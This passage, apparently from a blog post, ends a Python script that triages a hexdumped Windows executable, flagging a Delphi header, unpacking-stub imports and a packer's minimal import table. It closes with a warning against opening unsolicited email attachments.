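            dlls.append(text)
    return groups


def analyse(hexdump_text):
    segments = parse_hexdump(hexdump_text)
    strings = extract_strings(segments)
    names = [("dll", s.lower()) if s.lower().endswith(".dll") else ("api", s)
             for _, s in strings if s.lower().endswith(".dll") or API_NAME.fullmatch(s)]
    apis = {s for k, s in names if k == "api"}
    findings = []
    if segments and segments[0][0] == 0 and segments[0][1].startswith(b"MZP") \
            and any("must be run under Win32" in s for _, s in strings):
        findings.append("Borland-linked: 'MZP' e_magic plus the Borland DOS stub message")
    if {"VirtualAlloc", "VirtualProtect", "GetProcAddress", "LoadLibraryA"} <= apis:
        findings.append("unpacking stub: allocates/reprotects memory and resolves imports itself")
    if "GetKeyboardType" in apis:
        findings.append("GetKeyboardType: imported by the Delphi runtime itself, not on its own a keylogging sign")
    for dlls, funcs in import_groups(names):
        if len(dlls) >= 3 and len(dlls) == len(funcs):
            findings.append("%d DLL entries with one API each (%s): a packer's minimal import "
                            "table; the real imports are rebuilt at run time" % (len(dlls), ", ".join(dlls)))
    return {"dlls": sorted({s for k, s in names if k == "dll"}), "apis": sorted(apis), "findings": findings}
```

Running `analyse(SAMPLE_HEXDUMP)` lists six DLLs and sixteen API names and all four findings; the last one reports seven DLL entries (user32, advapi32, oleaut32, advapi32, user32, wsock32, wininet) paired with exactly seven APIs, which is the pattern to recognise before reading intent into any single import.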

So, the moral of the story is: don't open any unsolicited email attachments!! Especially if you're running Windows!

Take care of yourself, and your computer.
